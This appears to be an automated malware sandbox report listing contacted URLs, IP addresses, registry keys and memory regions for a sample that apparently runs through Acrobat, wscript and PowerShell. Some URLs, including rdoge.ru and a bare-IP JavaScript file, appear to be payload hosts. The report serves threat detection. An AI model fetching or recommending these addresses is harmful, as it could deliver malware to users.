https://rdoge.ru/bee/config.json
|
unknown
|
||
http://172.214.220.82/data/2p_bee.js
|
unknown
|
||
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txtKks;
|
unknown
|
||
https://raw.githubusercontent.com
|
unknown
|
||
http://raw.githubusercontent.com
|
unknown
|
||
https://analytics.paste.ee;
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://themes.googleusercontent.com
|
unknown
|
||
http://172.214.220.82/data/2p_bee.jsT
|
unknown
|
There are 50 hidden URLs, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
188.114.96.3
|
unknown
|
European Union
|
||
127.0.0.1
|
unknown
|
unknown
|
||
23.47.168.24
|
unknown
|
United States
|
||
185.199.109.133
|
unknown
|
Netherlands
|
||
172.214.220.82
|
unknown
|
United States
|
||
172.67.158.129
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
aFS
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tDIText
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileName
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileSource
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sFileAncestors
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDI
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDate
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uFileSize
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uPageCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sAssetId
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
bisSharedFile
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
aFS
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tDIText
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tFileName
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDI
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDate
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uFileSize
|
||
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uPageCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 27 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1C4CFFF6000
|
heap
|
page read and write
|
||
1BA58D0E000
|
heap
|
page read and write
|
||
189FC1F0000
|
heap
|
page read and write
|
||
7FF83BABD000
|
trusted library allocation
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
7FF83B876000
|
trusted library allocation
|
page read and write
|
||
189FBF70000
|
heap
|
page read and write
|
||
1A7C6836000
|
heap
|
page read and write
|
||
1BA5AE4C000
|
trusted library allocation
|
page read and write
|
||
1C4D04AD000
|
heap
|
page read and write
|
||
204E7F89000
|
heap
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
1EF4FD20000
|
heap
|
page read and write
|
||
2178E8B0000
|
trusted library allocation
|
page read and write
|
||
245935E5000
|
heap
|
page read and write
|
||
1C4CE22A000
|
heap
|
page read and write
|
||
20828170000
|
heap
|
page read and write
|
||
1C4CE22A000
|
heap
|
page read and write
|
||
24593D12000
|
heap
|
page read and write
|
||
BF5387E000
|
stack
|
page read and write
|
||
2DB327DF000
|
trusted library allocation
|
page read and write
|
||
21055E80000
|
heap
|
page read and write
|
||
1EF53495000
|
trusted library allocation
|
page read and write
|
||
2178CA60000
|
heap
|
page read and write
|
||
1C4CFFFA000
|
heap
|
page read and write
|
||
217A6AF6000
|
heap
|
page read and write
|
||
1ECD691F000
|
trusted library allocation
|
page read and write
|
||
189FE168000
|
heap
|
page read and write
|
||
1A7C6C47000
|
heap
|
page read and write
|
||
2390A152000
|
heap
|
page read and write
|
||
1C4CE20F000
|
heap
|
page read and write
|
||
1EF528A3000
|
trusted library allocation
|
page read and write
|
||
91B13BE000
|
stack
|
page read and write
|
||
2459171C000
|
heap
|
page read and write
|
||
1C4D0270000
|
heap
|
page read and write
|
||
24591788000
|
heap
|
page read and write
|
||
2546BC50000
|
heap
|
page read and write
|
||
204E74A0000
|
heap
|
page read and write
|
||
2178E534000
|
heap
|
page read and write
|
||
21055D8E000
|
heap
|
page read and write
|
||
204E74AC000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
24591990000
|
heap
|
page read and write
|
||
20811663000
|
trusted library allocation
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
1C4D0008000
|
heap
|
page read and write
|
||
FE1ABFD000
|
stack
|
page read and write
|
||
2178CB9E000
|
heap
|
page read and write
|
||
1AA518D0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
18C71BC0000
|
heap
|
page read and write
|
||
204E74AB000
|
heap
|
page read and write
|
||
24593D01000
|
heap
|
page read and write
|
||
2546BC3A000
|
heap
|
page read and write
|
||
B9A60FE000
|
stack
|
page read and write
|
||
85F3B23000
|
stack
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
D00F43000
|
stack
|
page read and write
|
||
2546B77C000
|
heap
|
page read and write
|
||
1BA72DE0000
|
heap
|
page read and write
|
||
1C4D07D4000
|
heap
|
page read and write
|
||
1ECE6470000
|
trusted library allocation
|
page read and write
|
||
1FBDD348000
|
trusted library allocation
|
page read and write
|
||
174D4B11000
|
trusted library allocation
|
page read and write
|
||
1A8DDBB6000
|
heap
|
page read and write
|
||
1ECD6467000
|
trusted library allocation
|
page read and write
|
||
2D4A6BF000
|
stack
|
page read and write
|
||
91B10FE000
|
stack
|
page read and write
|
||
139D8A3E000
|
heap
|
page read and write
|
||
24593A3F000
|
heap
|
page read and write
|
||
174D2E98000
|
heap
|
page read and write
|
||
1C4D07FD000
|
heap
|
page read and write
|
||
245935E3000
|
heap
|
page read and write
|
||
2080F763000
|
trusted library allocation
|
page read and write
|
||
24593AA7000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
98D64FE000
|
stack
|
page read and write
|
||
139D8AB7000
|
heap
|
page read and write
|
||
1ECEE637000
|
heap
|
page read and write
|
||
21055D65000
|
heap
|
page read and write
|
||
1A8DDD23000
|
trusted library allocation
|
page read and write
|
||
139D8AB2000
|
heap
|
page read and write
|
||
1AA51417000
|
heap
|
page execute and read and write
|
||
21055E83000
|
heap
|
page read and write
|
||
139D8B20000
|
heap
|
page read and write
|
||
7FF83B951000
|
trusted library allocation
|
page read and write
|
||
1C4D0019000
|
heap
|
page read and write
|
||
7FF83B7CD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B876000
|
trusted library allocation
|
page read and write
|
||
1FBE5370000
|
heap
|
page execute and read and write
|
||
1BA5AB92000
|
trusted library allocation
|
page read and write
|
||
7FF83B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
1C4D048B000
|
heap
|
page read and write
|
||
7FF83B972000
|
trusted library allocation
|
page read and write
|
||
2459172B000
|
heap
|
page read and write
|
||
1C4D0494000
|
heap
|
page read and write
|
||
1ECD44B8000
|
heap
|
page read and write
|
||
254698E8000
|
heap
|
page read and write
|
||
7FF83B962000
|
trusted library allocation
|
page read and write
|
||
23909F80000
|
heap
|
page read and write
|
||
189FC0B0000
|
heap
|
page read and write
|
||
1C4D04C6000
|
heap
|
page read and write
|
||
7FF83B972000
|
trusted library allocation
|
page read and write
|
||
7FF83B7CD000
|
trusted library allocation
|
page execute and read and write
|
||
2546BC46000
|
heap
|
page read and write
|
||
1A7C6C36000
|
heap
|
page read and write
|
||
2390BF11000
|
trusted library allocation
|
page read and write
|
||
1C4D07C9000
|
heap
|
page read and write
|
||
7FF83B876000
|
trusted library allocation
|
page execute and read and write
|
||
2103BD1D000
|
heap
|
page read and write
|
||
18980484000
|
trusted library allocation
|
page read and write
|
||
204E74BC000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
18990010000
|
trusted library allocation
|
page read and write
|
||
2546BC25000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
1ECD65BE000
|
trusted library allocation
|
page read and write
|
||
1ECD5DF0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
2459174A000
|
heap
|
page read and write
|
||
245939C0000
|
heap
|
page read and write
|
||
FE1B13E000
|
stack
|
page read and write
|
||
1BA58D00000
|
heap
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page read and write
|
||
1FBCB2E0000
|
heap
|
page read and write
|
||
1A7C49DF000
|
heap
|
page read and write
|
||
2DB32626000
|
heap
|
page execute and read and write
|
||
2178E9E8000
|
trusted library allocation
|
page read and write
|
||
85F417E000
|
stack
|
page read and write
|
||
955B47E000
|
stack
|
page read and write
|
||
85F3F7D000
|
stack
|
page read and write
|
||
9FC3D7E000
|
stack
|
page read and write
|
||
24591725000
|
heap
|
page read and write
|
||
5399D77000
|
stack
|
page read and write
|
||
2546BC1E000
|
heap
|
page read and write
|
||
174D4C0D000
|
trusted library allocation
|
page read and write
|
||
24593A00000
|
heap
|
page read and write
|
||
23924110000
|
heap
|
page read and write
|
||
7FF83B962000
|
trusted library allocation
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
2459377D000
|
heap
|
page read and write
|
||
1AA617C0000
|
trusted library allocation
|
page read and write
|
||
7FF83BB30000
|
trusted library allocation
|
page read and write
|
||
2459179D000
|
heap
|
page read and write
|
||
1ECD6911000
|
trusted library allocation
|
page read and write
|
||
1A8F7EF0000
|
heap
|
page read and write
|
||
2103BCD9000
|
heap
|
page read and write
|
||
1A7C6A71000
|
heap
|
page read and write
|
||
1A8F7EDB000
|
heap
|
page read and write
|
||
1898009C000
|
trusted library allocation
|
page read and write
|
||
1A7C6440000
|
heap
|
page read and write
|
||
24593AA2000
|
heap
|
page read and write
|
||
2459361E000
|
heap
|
page read and write
|
||
139D8AAC000
|
heap
|
page read and write
|
||
1A8DFA8F000
|
trusted library allocation
|
page read and write
|
||
1AA4F840000
|
heap
|
page read and write
|
||
24593D46000
|
heap
|
page read and write
|
||
1BA5AB82000
|
trusted library allocation
|
page read and write
|
||
21790552000
|
trusted library allocation
|
page read and write
|
||
24593ABE000
|
heap
|
page read and write
|
||
217A6E0E000
|
heap
|
page read and write
|
||
1FBCB310000
|
heap
|
page read and write
|
||
85F3BAF000
|
stack
|
page read and write
|
||
2546BC39000
|
heap
|
page read and write
|
||
2546BA22000
|
heap
|
page read and write
|
||
7FF83B7C4000
|
trusted library allocation
|
page read and write
|
||
174ECE0B000
|
heap
|
page read and write
|
||
139D8A88000
|
heap
|
page read and write
|
||
1A8E10BB000
|
trusted library allocation
|
page read and write
|
||
1ECD6926000
|
trusted library allocation
|
page read and write
|
||
1C4CE1EC000
|
heap
|
page read and write
|
||
1C4CE17D000
|
heap
|
page read and write
|
||
24593ABA000
|
heap
|
page read and write
|
||
24593628000
|
heap
|
page read and write
|
||
1A8DDD20000
|
trusted library allocation
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
245917A3000
|
heap
|
page read and write
|
||
1C4D04DF000
|
heap
|
page read and write
|
||
1AA4FB15000
|
heap
|
page read and write
|
||
2390C015000
|
trusted library allocation
|
page read and write
|
||
2179E9B1000
|
trusted library allocation
|
page read and write
|
||
1ECD6AB1000
|
trusted library allocation
|
page read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
117DCFC000
|
stack
|
page read and write
|
||
1AA51C7E000
|
trusted library allocation
|
page read and write
|
||
174D2E96000
|
heap
|
page read and write
|
||
1A8DDC90000
|
trusted library allocation
|
page read and write
|
||
1C4CE1B2000
|
heap
|
page read and write
|
||
1EF4FDF3000
|
heap
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
1BA5AE8C000
|
trusted library allocation
|
page read and write
|
||
2546BF06000
|
heap
|
page read and write
|
||
139D8A39000
|
heap
|
page read and write
|
||
1C4D0461000
|
heap
|
page read and write
|
||
24591727000
|
heap
|
page read and write
|
||
2546BC49000
|
heap
|
page read and write
|
||
245935EF000
|
heap
|
page read and write
|
||
1ECD4431000
|
heap
|
page read and write
|
||
1BA72D26000
|
heap
|
page read and write
|
||
2546B751000
|
heap
|
page read and write
|
||
24591791000
|
heap
|
page read and write
|
||
7FF83B7B0000
|
trusted library allocation
|
page read and write
|
||
7FF83B971000
|
trusted library allocation
|
page read and write
|
||
1BA58BB0000
|
heap
|
page read and write
|
||
1C4CFFED000
|
heap
|
page read and write
|
||
2546B76C000
|
heap
|
page read and write
|
||
883C6B8000
|
stack
|
page read and write
|
||
64F56FF000
|
stack
|
page read and write
|
||
2546BA54000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
1C4CE206000
|
heap
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
18990070000
|
trusted library allocation
|
page read and write
|
||
1898046D000
|
trusted library allocation
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
24593A75000
|
heap
|
page read and write
|
||
1ECD5E10000
|
trusted library allocation
|
page read and write
|
||
1C4D085E000
|
heap
|
page read and write
|
||
189FC000000
|
heap
|
page read and write
|
||
9FC35CE000
|
stack
|
page read and write
|
||
FE1A7C3000
|
stack
|
page read and write
|
||
2DB307D0000
|
heap
|
page read and write
|
||
1C4D0489000
|
heap
|
page read and write
|
||
7FF83B7A4000
|
trusted library allocation
|
page read and write
|
||
100073000
|
stack
|
page read and write
|
||
1C4D0471000
|
heap
|
page read and write
|
||
2459360C000
|
heap
|
page read and write
|
||
2546BA27000
|
heap
|
page read and write
|
||
1A7C684C000
|
heap
|
page read and write
|
||
23924022000
|
heap
|
page read and write
|
||
955B3FE000
|
stack
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
1C4D04D5000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
1C4D04E3000
|
heap
|
page read and write
|
||
1C4CE21B000
|
heap
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
2080F7B0000
|
heap
|
page read and write
|
||
1ECEE618000
|
heap
|
page read and write
|
||
1BA5AF7D000
|
trusted library allocation
|
page read and write
|
||
1ECD6952000
|
trusted library allocation
|
page read and write
|
||
2178E986000
|
heap
|
page execute and read and write
|
||
24593AB1000
|
heap
|
page read and write
|
||
2103BD15000
|
heap
|
page read and write
|
||
1C4CE1A2000
|
heap
|
page read and write
|
||
1A7C4950000
|
heap
|
page read and write
|
||
204E748B000
|
heap
|
page read and write
|
||
24593D15000
|
heap
|
page read and write
|
||
7FF83B88C000
|
trusted library allocation
|
page execute and read and write
|
||
139D8A3D000
|
heap
|
page read and write
|
||
18C6FF35000
|
heap
|
page read and write
|
||
1C4D03D0000
|
remote allocation
|
page read and write
|
||
7FF83B950000
|
trusted library allocation
|
page execute and read and write
|
||
1C4D041C000
|
heap
|
page read and write
|
||
204E7A66000
|
heap
|
page read and write
|
||
24591767000
|
heap
|
page read and write
|
||
1A7C67C0000
|
heap
|
page read and write
|
||
1ECD45D0000
|
heap
|
page read and write
|
||
1ECD6824000
|
trusted library allocation
|
page read and write
|
||
7FF83B960000
|
trusted library allocation
|
page execute and read and write
|
||
18C6FF30000
|
heap
|
page read and write
|
||
1EF51B60000
|
heap
|
page execute and read and write
|
||
B9A62B9000
|
stack
|
page read and write
|
||
1C4CE1E6000
|
heap
|
page read and write
|
||
1FBE5387000
|
heap
|
page read and write
|
||
1ECD699B000
|
trusted library allocation
|
page read and write
|
||
245935F6000
|
heap
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
1ECD43C0000
|
heap
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
56173FE000
|
stack
|
page read and write
|
||
1EF69D80000
|
heap
|
page read and write
|
||
56175BE000
|
stack
|
page read and write
|
||
18C0051E000
|
trusted library allocation
|
page read and write
|
||
2546B78D000
|
heap
|
page read and write
|
||
1A7C6820000
|
heap
|
page read and write
|
||
24593628000
|
heap
|
page read and write
|
||
2178CB8A000
|
heap
|
page read and write
|
||
2D4A73E000
|
stack
|
page read and write
|
||
B9A63BF000
|
stack
|
page read and write
|
||
1000FF000
|
stack
|
page read and write
|
||
24593AAC000
|
heap
|
page read and write
|
||
2178CC40000
|
heap
|
page read and write
|
||
1ECD64C1000
|
trusted library allocation
|
page read and write
|
||
2DB327F7000
|
trusted library allocation
|
page read and write
|
||
7FF83B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
2178E450000
|
heap
|
page read and write
|
||
2D49DE3000
|
stack
|
page read and write
|
||
1BA5ABDE000
|
trusted library allocation
|
page read and write
|
||
1ECE6461000
|
trusted library allocation
|
page read and write
|
||
2DB327E2000
|
trusted library allocation
|
page read and write
|
||
139D8A2B000
|
heap
|
page read and write
|
||
1BA58CE0000
|
heap
|
page read and write
|
||
1C4D0830000
|
heap
|
page read and write
|
||
1C4D04AA000
|
heap
|
page read and write
|
||
2390BA70000
|
trusted library allocation
|
page read and write
|
||
189804B9000
|
trusted library allocation
|
page read and write
|
||
1BA5AB06000
|
trusted library allocation
|
page read and write
|
||
24591724000
|
heap
|
page read and write
|
||
2103DC2E000
|
trusted library allocation
|
page read and write
|
||
1C4D0868000
|
heap
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
1C4CE1A6000
|
heap
|
page read and write
|
||
955B2FD000
|
stack
|
page read and write
|
||
1C4D07D4000
|
heap
|
page read and write
|
||
24593A83000
|
heap
|
page read and write
|
||
2546BF01000
|
heap
|
page read and write
|
||
1A7C6F1D000
|
heap
|
page read and write
|
||
1ECD64FB000
|
trusted library allocation
|
page read and write
|
||
1C4D07D5000
|
heap
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
1ECEE744000
|
heap
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
7FF83B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B97A000
|
trusted library allocation
|
page read and write
|
||
174E4B24000
|
trusted library allocation
|
page read and write
|
||
204E7494000
|
heap
|
page read and write
|
||
2103F819000
|
trusted library allocation
|
page read and write
|
||
1C4D0854000
|
heap
|
page read and write
|
||
1ECEE460000
|
heap
|
page execute and read and write
|
||
2390BF21000
|
trusted library allocation
|
page read and write
|
||
2103BD1B000
|
heap
|
page read and write
|
||
7FF83B8B6000
|
trusted library allocation
|
page execute and read and write
|
||
FE1B0BF000
|
stack
|
page read and write
|
||
1A7C6836000
|
heap
|
page read and write
|
||
18C71C22000
|
heap
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
7FF83B886000
|
trusted library allocation
|
page execute and read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
7FF83B87C000
|
trusted library allocation
|
page execute and read and write
|
||
204E743C000
|
heap
|
page read and write
|
||
7FF83BB00000
|
trusted library allocation
|
page read and write
|
||
20811503000
|
trusted library allocation
|
page read and write
|
||
BF53AB9000
|
stack
|
page read and write
|
||
FE1AD7E000
|
stack
|
page read and write
|
||
7FF83B8B6000
|
trusted library allocation
|
page execute and read and write
|
||
1C4CE20C000
|
heap
|
page read and write
|
||
1C4D000C000
|
heap
|
page read and write
|
||
1C4D0022000
|
heap
|
page read and write
|
||
1C4D0493000
|
heap
|
page read and write
|
||
1ECD5E20000
|
heap
|
page readonly
|
||
7FF83B9A0000
|
trusted library allocation
|
page execute and read and write
|
||
174D4B71000
|
trusted library allocation
|
page read and write
|
||
2DB32739000
|
trusted library allocation
|
page read and write
|
||
139D8A37000
|
heap
|
page read and write
|
||
1AA69860000
|
heap
|
page read and write
|
||
7FF83B82C000
|
trusted library allocation
|
page execute and read and write
|
||
1BA72EC0000
|
heap
|
page read and write
|
||
174D2F3D000
|
heap
|
page read and write
|
||
2103BD56000
|
heap
|
page read and write
|
||
1A7C6C47000
|
heap
|
page read and write
|
||
7FF83B7C4000
|
trusted library allocation
|
page read and write
|
||
1A7C6C26000
|
heap
|
page read and write
|
||
2390A085000
|
heap
|
page read and write
|
||
18C6FE20000
|
trusted library allocation
|
page read and write
|
||
883C83E000
|
stack
|
page read and write
|
||
7FF83B982000
|
trusted library allocation
|
page read and write
|
||
2390BFFD000
|
trusted library allocation
|
page read and write
|
||
9FC387F000
|
stack
|
page read and write
|
||
2546BA2A000
|
heap
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
7FF83B95A000
|
trusted library allocation
|
page read and write
|
||
1AA51C31000
|
trusted library allocation
|
page read and write
|
||
23924020000
|
heap
|
page read and write
|
||
955AF13000
|
stack
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
85F3FFE000
|
stack
|
page read and write
|
||
1C4CE1B6000
|
heap
|
page read and write
|
||
217A6AE5000
|
heap
|
page read and write
|
||
1C4CE20C000
|
heap
|
page read and write
|
||
2390BF4E000
|
trusted library allocation
|
page read and write
|
||
1C4CE1EC000
|
heap
|
page read and write
|
||
1BA58D20000
|
heap
|
page read and write
|
||
1C4D04C6000
|
heap
|
page read and write
|
||
7FF83BB00000
|
trusted library allocation
|
page read and write
|
||
204E7CA6000
|
heap
|
page read and write
|
||
1C4CE21B000
|
heap
|
page read and write
|
||
2103F7FE000
|
trusted library allocation
|
page read and write
|
||
139D8AB4000
|
heap
|
page read and write
|
||
1C4D000C000
|
heap
|
page read and write
|
||
883C63C000
|
stack
|
page read and write
|
||
1C4CE4EE000
|
heap
|
page read and write
|
||
1C4D0484000
|
heap
|
page read and write
|
||
1C4CE22A000
|
heap
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
1A7C6C6D000
|
heap
|
page read and write
|
||
BF536FF000
|
stack
|
page read and write
|
||
1FBE540E000
|
heap
|
page read and write
|
||
2546B789000
|
heap
|
page read and write
|
||
1FBE53BE000
|
heap
|
page read and write
|
||
204E7F72000
|
heap
|
page read and write
|
||
7FF83B8E0000
|
trusted library allocation
|
page execute and read and write
|
||
117E4FE000
|
stack
|
page read and write
|
||
2546B73A000
|
heap
|
page read and write
|
||
2179EB53000
|
trusted library allocation
|
page read and write
|
||
1C4D02B5000
|
heap
|
page read and write
|
||
1C4CE1D3000
|
heap
|
page read and write
|
||
1C4D04F8000
|
heap
|
page read and write
|
||
2546BF00000
|
heap
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
1C4D0294000
|
heap
|
page read and write
|
||
1C4D04EC000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
1BA5A630000
|
trusted library allocation
|
page read and write
|
||
1EF53331000
|
trusted library allocation
|
page read and write
|
||
7FF83B876000
|
trusted library allocation
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
7FF83BB00000
|
trusted library allocation
|
page read and write
|
||
2459178E000
|
heap
|
page read and write
|
||
18C71C4E000
|
heap
|
page read and write
|
||
189FC120000
|
heap
|
page execute and read and write
|
||
189FBFEC000
|
heap
|
page read and write
|
||
1A7C49B6000
|
heap
|
page read and write
|
||
2546B771000
|
heap
|
page read and write
|
||
1A7C6C37000
|
heap
|
page read and write
|
||
1C4D084B000
|
heap
|
page read and write
|
||
1A7C68F0000
|
remote allocation
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
174ECD76000
|
heap
|
page execute and read and write
|
||
B9A700D000
|
stack
|
page read and write
|
||
1C4CE1A0000
|
heap
|
page read and write
|
||
2546B761000
|
heap
|
page read and write
|
||
24593A40000
|
heap
|
page read and write
|
||
1A7C6813000
|
heap
|
page read and write
|
||
174D2CB0000
|
heap
|
page read and write
|
||
245935E4000
|
heap
|
page read and write
|
||
1C4D0852000
|
heap
|
page read and write
|
||
25469B55000
|
heap
|
page read and write
|
||
2080E100000
|
heap
|
page readonly
|
||
1ECD6991000
|
trusted library allocation
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
245935E9000
|
heap
|
page read and write
|
||
7FF83B886000
|
trusted library allocation
|
page execute and read and write
|
||
1EF4FF80000
|
heap
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page execute and read and write
|
||
2390BF5B000
|
trusted library allocation
|
page read and write
|
||
2080DEC9000
|
heap
|
page read and write
|
||
1C4D04EB000
|
heap
|
page read and write
|
||
7FF83B860000
|
trusted library allocation
|
page execute and read and write
|
||
1ECD6587000
|
trusted library allocation
|
page read and write
|
||
7FF83BB20000
|
trusted library allocation
|
page read and write
|
||
1ECEE537000
|
heap
|
page execute and read and write
|
||
139D8A16000
|
heap
|
page read and write
|
||
1A8E10C0000
|
trusted library allocation
|
page read and write
|
||
1C4CE22A000
|
heap
|
page read and write
|
||
204E749F000
|
heap
|
page read and write
|
||
204E7F7E000
|
heap
|
page read and write
|
||
1C4CE1F8000
|
heap
|
page read and write
|
||
2080F7B4000
|
heap
|
page read and write
|
||
1C4CFFFB000
|
heap
|
page read and write
|
||
174D4BAC000
|
trusted library allocation
|
page read and write
|
||
955B37F000
|
stack
|
page read and write
|
||
1C4CFFE1000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
